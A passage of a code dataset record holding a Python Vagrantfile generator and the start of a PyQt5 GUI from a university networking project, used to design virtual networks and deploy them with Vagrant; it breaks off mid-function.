"text": "import os\n\n\ndef create_vagrantfile(configuration):\n directory = configuration[5] + \"/Vagrantfile\"\n f = open(directory, \"w+\")\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n\n #Desktop environment script\n if(configuration[1]!=\"No Desktop Environment\"):\n f.write(\"$script = <<-SCRIPT\\n\")\n if(configuration[0][0] == \"u\"):\n f.write(\"sudo apt update\\n\")\n if(configuration[1] == \"Gnome\"):\n f.write(\"sudo apt -y install gnome-session\\n\")\n if(configuration[1] == \"KDE\"):\n f.write(\"sudo apt -y install kubuntu-desktop\\n\")\n if(configuration[1] == \"XFCE\"):\n f.write(\"sudo apt -y install xubuntu-desktop\\n\")\n if(configuration[1] == \"Mate\"):\n f.write(\"sudo apt -y install ubuntu-mate-desktop\\n\")\n f.write(\"sudo reboot\\n\")\n if(configuration[0][0] == \"d\"):\n f.write(\"sudo apt-get update\\n\")\n if (configuration[1] == \"Gnome\"):\n f.write(\"sudo apt-get -y install task-gnome-desktop\\n\")\n if (configuration[1] == \"KDE\"):\n f.write(\"sudo apt-get -y install task-kde-desktop\\n\")\n if (configuration[1] == \"XFCE\"):\n f.write(\"sudo apt-get -y install task-xfce-desktop\\n\")\n if (configuration[1] == \"Mate\"):\n f.write(\"sudo apt-get -y install task-mate-desktop\\n\")\n f.write(\"sudo reboot\\n\")\n if(configuration[0][0] == \"c\"):\n if (configuration[1] == \"Gnome\"):\n f.write(\"yum -y groups install \\\"GNOME Desktop\\\"\\n\")\n f.write(\"echo \\\"exec gnome-session\\\" >> ~/.xinitrc\\n\")\n if (configuration[1] == \"KDE\"):\n f.write(\"yum -y groups install \\\"KDE Plasma Workspaces\\\"\\n\")\n f.write(\"echo \\\"exec startkde\\\" >> ~/.xinitrc\\n\")\n if (configuration[1] == \"XFCE\"):\n f.write(\"yum --enablerepo=epel -y groups install \\\"Xfce\\\"\\n\")\n f.write(\"echo \\\"exec /usr/bin/xfce4-session\\\" >> ~/.xinitrc\\n\")\n if (configuration[1] == \"Mate\"):\n f.write(\"yum --enablerepo=epel -y groups install \\\"MATE Desktop\\\"\\n\")\n f.write(\"echo \\\"exec /usr/bin/mate-session\\\" >> ~/.xinitrc\\n\")\n f.write(\"startx\\n\")\n f.write(\"SCRIPT\\n\\n\")\n\n #Virtual machine configuration\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"\\tconfig.vm.box = \\\"\" + configuration[0] + \"\\\"\\n\")\n f.write(\"\\tconfig.vm.host_name = \\\"\" + configuration[5] + \"\\\"\\n\")\n f.write(\"\\tconfig.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"\\t\\tvb.gui = true\\n\")\n f.write(\"\\t\\tvb.memory = \" + configuration[3] + \"\\n\")\n f.write(\"\\t\\tvb.cpus = \" + configuration[2] + \"\\n\")\n if(configuration[4] != \"0\"):\n f.write(\"\\t\\tvb.customize [\\\"modifyvm\\\", :id, \\\"--vram\\\", \\\"\" + configuration[4] + \"\\\"]\\n\")\n f.write(\"\\tend\\n\")\n if (configuration[1] != \"No Desktop Environment\"):\n f.write(\"\\tconfig.vm.provision \\\"shell\\\", inline: $script\\n\")\n f.write(\"end\\n\")\n\n f.close()\n\ndef create_folder(vm_name):\n directory = vm_name\n if not os.path.exists(directory):\n os.makedirs(directory)"
},
{
"alpha_fraction": 0.648282527923584,
"alphanum_fraction": 0.6535208225250244,
"avg_line_length": 48.60490036010742,
"blob_id": "8bae48f05a8f10198cdc3f25f30a9913c15ea56a",
"content_id": "ee616d332119d95e87bf9331ca707122e3ea49a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 46580,
"license_type": "permissive",
"max_line_length": 288,
"num_lines": 939,
"path": "/gui.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "\"\"\" _____________________________________________________________\n\n Description: User interface code of the network designer\n Author: Giuseppe Superbo ([email protected])\n Date: Winter 2020-2021\n Course: Design of Networks and Communication Systems\n _____________________________________________________________\n\"\"\"\n\nimport sys, os\nfrom PyQt5 import QtGui, QtWidgets, QtCore, uic, QtWebEngineWidgets\nfrom pyvis.network import Network\n#import matplotlib.image as mpimg\n#import numpy\nimport network_core\n\n\"\"\"\nCustom Libraries\n\"\"\"\ncustom_lib_path = os.path.abspath(os.path.abspath(\"./fromHTMLtoVagrant\"))\nsys.path.append(custom_lib_path)\nimport vagrantConverterCollector\n\nclass network_design_window(QtWidgets.QMainWindow):\n \"\"\"\n Class from which it is possible to instantiate the main window. \n This window contains the design network canvas and all the functionalities related to it.\n\n \"\"\"\n errorSignal = QtCore.pyqtSignal(str)\n outputSignal = QtCore.pyqtSignal(str)\n def __init__(self):\n \"\"\"Default method that initializes the instance of the main_window.\n\n Parameters:\n - self: current instance of the class.\n \n Attributes:\n - current_network: network currently active for any edit;\n - current_network_name: name of the current network\n - network_wizard: network wizard window object (Inheritance model)\n - editor_window: editor window object (Inheritance model)\n\n \"\"\"\n super(network_design_window, self).__init__()\n self.initialize_window()\n\n def initialize_window(self):\n \"\"\"Method that initializes all the components of the main window.\n\n Parameters:\n - self: current instance of the class.\n \"\"\"\n self.current_network = network_core.create_network()\n self.current_network_name = \"\"\n self.current_network_path = \"\"\n self.current_network_template = \"\"\n self.current_network_deployed = 0\n self.vm_power = 0\n self.resize(1325, 768)\n self.center()\n self.setWindowTitle(\"Virtual Network automated deployment via Vagrant\")\n self.main_toolbar()\n self.statusbar()\n self.setWindowIcon(QtGui.QIcon(\"./Images/network.png\"))\n self.main_frame = QtWidgets.QWidget()\n self.main_frame_layout = QtWidgets.QVBoxLayout(self.main_frame)\n self.setCentralWidget(self.main_frame)\n self.canvas_html()\n self.debug_console()\n self.network_wizard = new_network_wizard(self)\n self.editor_window = editor_components(self)\n self.dashboard_window = dashboard_vms(self)\n self.ssh_window = ssh_connection(self)\n self.edge_window = edge_editors(self)\n self.vagrant_process = QtCore.QProcess(self)\n self.dashboard_process = QtCore.QProcess(self)\n self.vagrant_process.readyReadStandardOutput.connect(self.onReadyReadStandardOutput)\n self.vagrant_process.readyReadStandardError.connect(self.onReadyReadStandardError)\n\n\n def center(self):\n \"\"\"Method that centers the main window depending on the user resolution.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n qr = self.frameGeometry()\n cp = QtWidgets.QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n\n def main_toolbar(self):\n \"\"\"Method that defines the toolbar with all the corresponding button/actions.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\" \n self.main_toolbar = QtWidgets.QToolBar(self)\n self.addToolBar(QtCore.Qt.TopToolBarArea, self.main_toolbar)\n self.main_toolbar.setIconSize(QtCore.QSize(64,64))\n self.main_toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)\n \n self.button_router = QtWidgets.QAction(QtGui.QIcon(\"./Images/router.png\"), \"Label\", self)\n self.button_router.setStatusTip(\"Add a router to the network\")\n self.button_router.setToolTip(\"Add a router to the network\")\n self.button_router.setIconText(\"Router\")\n self.button_router.setDisabled(True)\n \n self.button_switch = QtWidgets.QAction(QtGui.QIcon(\"./Images/switch.png\"), \"Label\", self)\n self.button_switch.setStatusTip(\"Add a switch to the network\")\n self.button_switch.setToolTip(\"Add a switch to the network\")\n self.button_switch.setIconText(\"Switch\")\n self.button_switch.setDisabled(True)\n\n self.button_host = QtWidgets.QAction(QtGui.QIcon(\"./Images/host.png\"), \"Label\", self)\n self.button_host.setStatusTip(\"Add a host to the network\")\n self.button_host.setToolTip(\"Add a host to the network\")\n self.button_host.setIconText(\"Host\")\n self.button_host.setDisabled(True)\n\n self.button_other = QtWidgets.QAction(QtGui.QIcon(\"./Images/webserver.png\"), \"Label\", self)\n self.button_other.setStatusTip(\"Add an other tipology of device to the network\")\n self.button_other.setToolTip(\"Add an other tipology of device to the network\")\n self.button_other.setIconText(\"Other\")\n self.button_other.setDisabled(True)\n\n self.button_editor = QtWidgets.QAction(QtGui.QIcon(\"./Images/tool.png\"), \"Label\", self)\n self.button_editor.setStatusTip(\"Edit virtual network devices\")\n self.button_editor.setToolTip(\"Edit virtual network devices\")\n self.button_editor.setIconText(\"Edit configuration\")\n self.button_editor.triggered.connect(lambda: self.editor_window.show())\n self.button_editor.setDisabled(True)\n\n self.button_edge = QtWidgets.QAction(QtGui.QIcon(\"./Images/edge.png\"), \"Label\", self)\n self.button_edge.setStatusTip(\"Edit edge/link characteristics\")\n self.button_edge.setToolTip(\"Edit edge/link characteristics\")\n self.button_edge.setIconText(\"Edge configuration\")\n self.button_edge.triggered.connect(lambda: self.edge_window.show())\n self.button_edge.setDisabled(True)\n\n self.button_new = QtWidgets.QAction(QtGui.QIcon(\"./Images/newfile.png\"), \"Label\", self)\n self.button_new.setStatusTip(\"Create a new network\")\n self.button_new.setToolTip(\"Create a new network\")\n self.button_new.setIconText(\"New Network\")\n self.button_new.triggered.connect(lambda: self.network_wizard.show())\n\n self.button_save = QtWidgets.QAction(QtGui.QIcon(\"./Images/save.png\"), \"Label\", self)\n self.button_save.setStatusTip(\"Save the current network\")\n self.button_save.setToolTip(\"Save the current network\")\n self.button_save.setIconText(\"Save Network\")\n self.button_save.triggered.connect(lambda: self.save_file_window())\n self.button_save.setDisabled(True)\n\n self.button_open = QtWidgets.QAction(QtGui.QIcon(\"./Images/openfile.png\"), \"Label\", self)\n self.button_open.setStatusTip(\"Open an existent network\")\n self.button_open.setToolTip(\"Open an existent network\")\n self.button_open.setIconText(\"Open Network\")\n self.button_open.triggered.connect(lambda: self.open_file_window())\n\n self.button_vagrant = QtWidgets.QAction(QtGui.QIcon(\"./Images/vagrant.png\"), \"Label\", self)\n self.button_vagrant.setStatusTip(\"Deploy the virtual network via vagrant\")\n self.button_vagrant.setToolTip(\"Deploy the virtual network via vagrant\")\n self.button_vagrant.setIconText(\"Deploy network\")\n self.button_vagrant.triggered.connect(lambda: self.vagrant_execution())\n self.button_vagrant.setDisabled(True)\n\n self.button_dashboard = QtWidgets.QAction(QtGui.QIcon(\"./Images/dashboard.png\"), \"Label\", self)\n self.button_dashboard.setStatusTip(\"Open the statistics and control dashboard of the deployed network\")\n self.button_dashboard.setToolTip(\"Open the statistics and control dashboard of the deployed network\")\n self.button_dashboard.setIconText(\"Control dashboard\")\n self.button_dashboard.triggered.connect(lambda: self.dashboard_window.show())\n self.button_dashboard.setDisabled(True)\n\n self.button_ssh = QtWidgets.QAction(QtGui.QIcon(\"./Images/ssh.png\"), \"Label\", self)\n self.button_ssh.setStatusTip(\"Prompt for making an ssh connection to a specific node\")\n self.button_ssh.setToolTip(\"Prompt for making an ssh connection to a specific node\")\n self.button_ssh.setIconText(\"SSH Connection\")\n self.button_ssh.triggered.connect(lambda: self.ssh_window.show())\n self.button_ssh.setDisabled(True)\n\n self.button_terminal = QtWidgets.QAction(QtGui.QIcon(\"./Images/terminal.png\"), \"Label\", self)\n self.button_terminal.setStatusTip(\"Open the debug console\")\n self.button_terminal.setToolTip(\"Open the debug console\")\n self.button_terminal.setIconText(\"Debug console\")\n self.button_terminal.triggered.connect(lambda: self.debug_console_frame.setVisible(False) if self.debug_console_frame.isVisible() else self.debug_console_frame.setVisible(True))\n\n self.button_power = QtWidgets.QAction(QtGui.QIcon(\"./Images/switchoff_on.png\"), \"Label\", self)\n self.button_power.setStatusTip(\"Turn on/off any device of the network\")\n self.button_power.setToolTip(\"Turn on/off any device of the network\")\n self.button_power.setIconText(\"Turn on/off VMs\")\n self.button_power.triggered.connect(lambda: self.vagrant_halt())\n self.button_power.setDisabled(True)\n \n self.button_destroy = QtWidgets.QAction(QtGui.QIcon(\"./Images/bin.png\"), \"Label\", self)\n self.button_destroy.setStatusTip(\"Destroy the current deployed virtual machines\")\n self.button_destroy.setToolTip(\"Destroy the current deployed virtual machines\")\n self.button_destroy.setIconText(\"Destroy network\")\n self.button_destroy.triggered.connect(lambda: self.vagrant_destroy())\n self.button_destroy.setDisabled(True)\n \n self.main_toolbar.addAction(self.button_new)\n self.main_toolbar.addAction(self.button_save)\n self.main_toolbar.addAction(self.button_open)\n self.main_toolbar.addSeparator()\n self.main_toolbar.addAction(self.button_router)\n self.main_toolbar.addAction(self.button_switch)\n self.main_toolbar.addAction(self.button_host)\n self.main_toolbar.addAction(self.button_other)\n self.main_toolbar.addAction(self.button_editor)\n self.main_toolbar.addAction(self.button_edge)\n self.main_toolbar.addSeparator()\n self.main_toolbar.addAction(self.button_vagrant)\n self.main_toolbar.addAction(self.button_dashboard)\n self.main_toolbar.addAction(self.button_ssh)\n self.main_toolbar.addAction(self.button_terminal)\n self.main_toolbar.addAction(self.button_power)\n self.main_toolbar.addAction(self.button_destroy)\n\n\n def statusbar(self):\n \"\"\"Method that defines the statusbar at the bottom of the main window. This status bar is used to prompt hints or low priority messages from the application.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n self.statusBar().showMessage(\"No deployed network\")\n\n\n def enable_buttons_editing(self):\n self.button_save.setEnabled(True)\n self.button_vagrant.setEnabled(True)\n self.button_editor.setEnabled(True)\n self.button_edge.setEnabled(True)\n \n \n def canvas_html(self):\n \"\"\"Method that defines the canvas where the network is prompted.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n QtWebEngineWidgets.QWebEngineSettings.ShowScrollBars=False\n self.canvas_frame = QtWebEngineWidgets.QWebEngineView()\n self.main_frame_layout.addWidget(self.canvas_frame)\n \n \n \n def update_canvas_html(self, html_path):\n \"\"\"Method that updates the content of the canvas with a different html network file.\n\n Parameters:\n - self: current instance of the class;\n - html_path: absolute path of the html network file.\n \"\"\"\n self.canvas_frame.load(QtCore.QUrl.fromLocalFile(html_path))\n \n \n def open_file_window(self):\n \"\"\"Method that prompt an explorer window for opening a new html network file.\n\n Parameters:\n - self: current instance of the class.\n \"\"\"\n file_path = QtWidgets.QFileDialog.getOpenFileName(self, 'OpenFile')\n if(len(file_path) > 2):\n self.current_network = network_core.open_network(file_path[0])\n self.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.current_network_path = os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n self.editor_window = editor_components(self)\n self.dashboard_window = dashboard_vms(self)\n self.edge_window = edge_editors(self)\n self.enable_buttons_editing()\n \n \n def save_file_window(self):\n file_path = QtWidgets.QFileDialog.getSaveFileName(self, 'SaveFile')\n self.current_network.save_graph(file_path[0])\n\n def debug_console(self):\n self.debug_console_frame = QtWidgets.QWidget(self.main_frame)\n self.debug_console_layout = QtWidgets.QVBoxLayout()\n self.debug_console_frame.setLayout(self.debug_console_layout)\n self.debug_console_textedit = QtWidgets.QPlainTextEdit()\n self.debug_console_textedit.setReadOnly(True)\n self.debug_console_frame.move(5,430)\n self.debug_console_frame.setMinimumHeight(220)\n self.debug_console_frame.setMinimumWidth(1320)\n self.debug_console_textedit.resize(self.debug_console_textedit.sizeHint().width(), self.debug_console_textedit.minimumHeight())\n self.debug_console_textedit.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)\n self.debug_console_label = QtWidgets.QLabel(\"Debug console\")\n self.debug_console_layout.addWidget(self.debug_console_label)\n self.debug_console_layout.addWidget(self.debug_console_textedit)\n self.debug_console_frame.hide()\n\n def vagrant_execution(self):\n os.chdir(\"./NetworkGraphs\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant up')\n os.chdir(\"..\")\n os.mkdir(self.current_network_name)\n os.chdir(\"./\" + self.current_network_name)\n print(\"./\" + self.current_network_name)\n print(self.current_network_template)\n vagrantConverterCollector.converter_selector(self.current_network_path, self.current_network_template)\n self.debug_console_textedit.clear()\n self.vagrant_process.start('vagrant up')\n self.vm_power = 1\n \n self.button_vagrant.setDisabled(True)\n self.button_dashboard.setEnabled(True)\n self.button_destroy.setEnabled(True)\n self.button_ssh.setEnabled(True)\n self.button_power.setEnabled(True)\n self.button_power.setIconText(\"Turn off VMs\")\n\n def vagrant_halt(self):\n if(self.vm_power == 1):\n self.vagrant_process.start('vagrant halt')\n os.chdir(\"..\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant halt')\n self.vm_power = 0\n os.chdir(\"..\")\n os.chdir(\"./\" + self.current_network_name)\n self.button_power.setIconText(\"Turn on VMs\")\n else:\n self.vagrant_process.start('vagrant up')\n os.chdir(\"..\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant up')\n self.vm_power = 1\n os.chdir(\"..\")\n os.chdir(\"./\" + self.current_network_name)\n self.button_power.setIconText(\"Turn off VMs\")\n\n\n def vagrant_destroy(self):\n self.vagrant_process.start('vagrant destroy -f')\n os.chdir(\"..\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant destroy -f')\n self.vm_power = 0\n self.button_dashboard.setDisabled(True)\n self.button_vagrant.setEnabled(True)\n self.button_destroy.setDisabled(True)\n self.button_ssh.setDisabled(True)\n self.button_power.setDisabled(True)\n \n\n def onReadyReadStandardOutput(self):\n result = self.vagrant_process.readAllStandardOutput().data().decode()\n self.debug_console_textedit.appendPlainText(result)\n self.outputSignal.emit(result)\n \n def onReadyReadStandardError(self):\n error = self.vagrant_process.readAllStandardError().data().decode()\n self.debug_console_textedit.appendPlainText(error)\n self.errorSignal.emit(error)\n \n \nclass new_network_wizard(QtWidgets.QWizard):\n \"\"\"\n Class from which it is possible to instantiate the wizard window. \n From this wizard it is possible to create a new network from scratch or from an existing template.\n\n \"\"\"\n\n def __init__(self, main_window):\n \"\"\"Default method that initializes the instance of the main_window.\n\n Parameters:\n - self: current instance of the class;\n - main_window: reference of the main window calling instance.\n \n Attributes:\n - main_window_object: reference of the object that has istantiated an object from this class;\n - templates_directory_path: absolute path of the template directory used in the wizard selection;\n - page_start, group_buttons: starting page object of the wizard and its buttons choice;\n - scratch_page: scratch page object where it is possible to insert the details for creating a network from scratch;\n - scratch_id: scratch page id;\n - template_page: template page object where it is possible to insert the details for creating a network from a template;\n - template_id: template page id;\n\n \"\"\"\n super(new_network_wizard, self).__init__()\n self.main_window_object = main_window\n self.templates_directory_path = os.path.abspath(\"./NetworkGraphs/Template\")\n self.page_start, self.group_buttons = self.page_network_source()\n self.setWindowIcon(QtGui.QIcon(\"./Images/plus.png\"))\n self.addPage(self.page_start)\n self.scratch_page = self.page_network_scratch()\n self.scratch_page.setFinalPage(True)\n self.scratch_id = self.addPage(self.scratch_page)\n self.template_page = self.page_network_template()\n self.template_id = self.addPage(self.template_page)\n self.currentIdChanged.connect(self.hide_next)\n self.button(QtWidgets.QWizard.FinishButton).clicked.connect(self.onFinish)\n self.setWizardStyle(QtWidgets.QWizard.ModernStyle)\n self.setWindowTitle(\"New virtual network\")\n self.resize(640,540)\n\n def hide_next(self):\n \"\"\"Method that hides the default next button on a specific wizard page.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n if self.currentPage() == self.scratch_page:\n self.button(QtWidgets.QWizard.NextButton).hide()\n\n def nextId(self):\n \"\"\"Method that retrieves the next wizard page ID. This method is crucial for the tree structure of the wizard.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n choice = self.group_buttons.checkedButton().text()\n if self.currentPage() == self.page_start:\n if \"Create\" in choice:\n return self.scratch_id\n return self.template_id\n return QtWidgets.QWizard.nextId(self) \n \n def page_network_source(self):\n \"\"\"Method that initializes the wizard page from which it is possible to choose the source of the new network.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n page = QtWidgets.QWizardPage(self)\n page.setTitle(\"Choose your starting point\")\n label = QtWidgets.QLabel(\"Select if you want to start from a template network or from scratch:\")\n group_radiobutton = QtWidgets.QButtonGroup(page)\n radiobutton_option1 = QtWidgets.QRadioButton(\"Create a new network from scratch\")\n group_radiobutton.addButton(radiobutton_option1)\n radiobutton_option1.setChecked(True)\n radiobutton_option2 = QtWidgets.QRadioButton(\"Import a network from a template\")\n radiobutton_option2.setChecked(False)\n group_radiobutton.addButton(radiobutton_option2)\n layout = QtWidgets.QVBoxLayout()\n layout.addWidget(label)\n layout.addWidget(radiobutton_option1)\n layout.addWidget(radiobutton_option2)\n page.setLayout(layout)\n return page, group_radiobutton\n\n def page_network_scratch(self):\n \"\"\"Method that initializes the wizard page from which it is possible to create a network from scratch by inputting the new network name.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n page = QtWidgets.QWizardPage(self)\n page.setTitle(\"New network from scratch\")\n label = QtWidgets.QLabel(\"Insert the following details of your new virtual network:\")\n layout = QtWidgets.QFormLayout(page)\n textbox_label = QtWidgets.QLabel(\"Insert the network name:\")\n textbox_name = QtWidgets.QLineEdit(page)\n textbox_layout = QtWidgets.QHBoxLayout()\n textbox_layout.addWidget(textbox_label)\n textbox_layout.addWidget(textbox_name)\n layout.addRow(label)\n layout.addRow(textbox_layout)\n page.registerField(\"network_name_scratch\", textbox_name)\n return page\n\n def page_network_template(self):\n \"\"\"Method that initializes the wizard page from which it is possible to create a network from template by inputting the new network name and choosing a network template.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\" \n page = QtWidgets.QWizardPage(self)\n page.setTitle(\"New network from template\")\n templates_list = [ f for f in os.listdir(self.templates_directory_path) if os.path.isfile(os.path.join(self.templates_directory_path,f)) ]\n label = QtWidgets.QLabel(\"Select the starting template for your new virtuale network:\")\n textbox_label = QtWidgets.QLabel(\"Insert the network name:\")\n textbox_name = QtWidgets.QLineEdit(page)\n templates_combobox = QtWidgets.QComboBox(page)\n for template in templates_list:\n templates_combobox.addItem(template)\n preview_frame = QtWebEngineWidgets.QWebEngineView(page)\n preview_frame.load(QtCore.QUrl.fromLocalFile(self.templates_directory_path + \"/\" + str(templates_combobox.currentText())))\n preview_frame.setFixedSize(600,350)\n preview_frame.setZoomFactor(0.65)\n preview_frame.page().runJavaScript(\"window.scrollTo(100,100)\")\n templates_combobox.activated[str].connect(lambda: preview_frame.load(QtCore.QUrl.fromLocalFile(self.templates_directory_path + \"/\" + str(templates_combobox.currentText()))))\n layout = QtWidgets.QFormLayout(page)\n layout.addRow(label)\n layout.addRow(templates_combobox)\n textbox_layout = QtWidgets.QHBoxLayout()\n textbox_layout.addWidget(textbox_label)\n textbox_layout.addWidget(textbox_name)\n layout.addRow(textbox_layout)\n layout.addRow(preview_frame)\n page.registerField(\"network_name\", textbox_name)\n page.registerField(\"network_path\", templates_combobox, \"currentText\")\n return page\n \n def onFinish(self):\n \"\"\"Method called when the finish button of the wizard is pushed. It creates a new network based on the user choices and makes it available on the main editor.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n if self.currentId() == self.template_id:\n template_path = self.templates_directory_path + \"/\" + self.template_page.field(\"network_path\")\n self.main_window_object.current_network_template = template_path.split(\"/\")[len(template_path.split(\"/\"))-1].split(\"_\")[0]\n self.main_window_object.current_network = network_core.open_network(template_path)\n self.main_window_object.current_network_name = self.template_page.field(\"network_name\")\n self.main_window_object.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.current_network_path = os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n self.main_window_object.editor_window = editor_components(self.main_window_object)\n self.main_window_object.dashboard_window = dashboard_vms(self.main_window_object)\n self.main_window_object.ssh_window = ssh_connection(self.main_window_object)\n self.main_window_object.edge_window = edge_editors(self.main_window_object)\n self.main_window_object.enable_buttons_editing()\n else:\n print(self.scratch_page.field(\"network_name_scratch\"))\n self.main_window_object.current_network_name = self.template_page.field(\"network_path\")\n\n\nclass ssh_connection(QtWidgets.QMainWindow):\n\n def __init__(self, main_window):\n super(ssh_connection, self).__init__()\n self.main_window_object = main_window\n self.layout = QtWidgets.QVBoxLayout(self)\n self.setWindowTitle(\"SSH Connection to a node\")\n self.setWindowIcon(QtGui.QIcon(\"./Images/ssh.png\"))\n self.label_combobox = QtWidgets.QLabel(\"Select the virtual machine:\")\n self.vm_combobox = QtWidgets.QComboBox()\n self.vm_names()\n self.button_frame = QtWidgets.QWidget()\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignRight)\n self.button_ssh = QtWidgets.QPushButton(\"SSH Connection\")\n self.button_ssh.clicked.connect(self.ssh_connection)\n self.button_cancel = QtWidgets.QPushButton(\"Cancel\")\n self.button_layout.addWidget(self.button_ssh)\n self.button_layout.addWidget(self.button_cancel)\n self.button_frame.setLayout(self.button_layout)\n self.layout.addWidget(self.label_combobox)\n self.layout.addWidget(self.vm_combobox)\n self.layout.addWidget(self.button_frame)\n self.window = QtWidgets.QWidget()\n self.window.setLayout(self.layout)\n #self.window.setMinimumWidth(200)\n #self.window.setFixedWidth(200)\n self.setCentralWidget(self.window)\n self.setMinimumWidth(400)\n\n def ssh_connection(self):\n current_vm = self.vm_combobox.currentText()\n command = \"start cmd /k vagrant ssh \" + current_vm\n os.system(command)\n \n def vm_names(self):\n nodes = self.main_window_object.current_network.nodes\n for node in nodes:\n self.vm_combobox.addItem(node[\"label\"])\n\n\nclass dashboard_vms(QtWidgets.QMainWindow):\n\n def __init__(self, main_window):\n super(dashboard_vms, self).__init__()\n self.resize(1274, 768)\n self.setWindowIcon(QtGui.QIcon(\"./Images/dashboard.png\"))\n self.setWindowTitle(\"Dashboard statics monitoring\")\n self.browser = QtWebEngineWidgets.QWebEngineView()\n self.browser.setUrl(QtCore.QUrl(\"http://127.0.0.1:3000/d/sF7d-FHZz/dashboard-network-nodes-monitoring?orgId=1&refresh=1m\"))\n self.setCentralWidget(self.browser)\n\n\nclass editor_components(QtWidgets.QMainWindow):\n \"\"\"\n Class from which it is possible to instantiate the device editor window. \n This window contains all the details of each component that can be changed in order to create a new configuration.\n\n \"\"\"\n def __init__(self, main_window):\n \"\"\"Default method that initializes the instance of the device editor window.\n\n Parameters:\n - self: current instance of the class;\n - main_window: reference of the main window calling instance.\n\n Attributes:\n - main_window_object: reference of the object that has istantiated an object from this class;\n - tabs: tab collection object;\n - routers: list of routers from the current network;\n - swithces: list of switches from the current network;\n - hosts: list of hosts from the current network;\n - router_tab: tab form object where it is possible to edit routers configuration;\n - switch_tab: tab form object where it is possible to edit switches configuration;\n - host_tab: tab form object where it is possible to edit hosts configuration;\n - button_frame: frame object where all the buttons of the editor window are located;\n - button_layout: layout object for the buttons;\n - button_save: button object for saving the configuration;\n - button_cancel: button object for deleting the changes;\n - window: generic widget object that contains all the other widgets.\n\n \"\"\" \n super(editor_components, self).__init__()\n self.main_window_object = main_window\n self.temporary_network = self.main_window_object.current_network\n #print(self.temporary_network.nodes)\n self.resize(1024, 768)\n self.setWindowTitle(\"Editor virtual devices configuration\")\n self.setWindowIcon(QtGui.QIcon(\"./Images/network.png\"))\n self.tabs = QtWidgets.QTabWidget()\n self.routers = network_core.nodes_search_type(self.temporary_network, \"router\")\n self.switches = network_core.nodes_search_type(self.temporary_network, \"switch\")\n self.hosts = network_core.nodes_search_type(self.temporary_network, \"host\")\n self.others = network_core.nodes_search_type(self.temporary_network, \"others\")\n self.router_tab = self.editor_form(\"Router\", self.routers)\n self.switch_tab = self.editor_form(\"Switch\", self.switches)\n self.host_tab = self.editor_form(\"Host\", self.hosts)\n self.other_tab = self.editor_form(\"Other\", self.others)\n self.tabs.resize(1000,700)\n self.tabs.addTab(self.router_tab, \"Routers\")\n self.tabs.addTab(self.switch_tab, \"Switches\")\n self.tabs.addTab(self.host_tab, \"Hosts\")\n self.tabs.addTab(self.other_tab, \"Others\")\n self.layout = QtWidgets.QVBoxLayout(self)\n self.layout.addWidget(self.tabs)\n self.button_frame = QtWidgets.QWidget()\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignRight)\n self.button_save = QtWidgets.QPushButton(\"Save\")\n self.button_save.clicked.connect(self.on_save)\n self.button_cancel = QtWidgets.QPushButton(\"Cancel\")\n self.button_cancel.clicked.connect(self.on_cancel)\n self.button_layout.addWidget(self.button_save)\n self.button_layout.addWidget(self.button_cancel)\n self.button_frame.setLayout(self.button_layout)\n self.layout.addWidget(self.button_frame)\n self.window = QtWidgets.QWidget()\n self.window.setLayout(self.layout)\n self.setCentralWidget(self.window)\n \n def editor_form(self, type, devices):\n \"\"\"Method that initializes a form which contains all the widgets from which it is possible to change the device configuration.\n\n Parameters:\n - self: current instance of the class;\n - type: type of the devices to be edit.\n \n Returns:\n - tab: QTab widget object that contains the initialized form of all the devices of the specific type.\n\n \"\"\"\n tab = QtWidgets.QWidget()\n edit_lines = {}\n if len(devices) > 0:\n window_layout = QtWidgets.QVBoxLayout(tab)\n form = QtWidgets.QGroupBox(type + \" configuration\")\n form.setFixedSize(1000, 700)\n form_layout = QtWidgets.QGridLayout(self)\n form.setLayout(form_layout)\n form.setAlignment(QtCore.Qt.AlignTop)\n devices_label = QtWidgets.QLabel(\"Select the device to be configured:\")\n devices_combobox = QtWidgets.QComboBox()\n for device in devices:\n devices_combobox.addItem(device[\"label\"])\n \n devices_combobox.setItemText\n form_0_0 = QtWidgets.QWidget()\n form_0_0_layout = QtWidgets.QHBoxLayout()\n form_0_0.setLayout(form_0_0_layout)\n edit_lines[\"device_name_box\"] = QtWidgets.QLineEdit()\n edit_lines[\"device_name_box\"].textChanged[str].connect(lambda: (self.temporary_edits(\"label\", edit_lines[\"device_name_box\"].text(), devices, devices_combobox.currentIndex()), devices_combobox.setItemText(devices_combobox.currentIndex(), edit_lines[\"device_name_box\"].text())))\n \n form_0_0_layout.addWidget(QtWidgets.QLabel(\"Device name:\"))\n 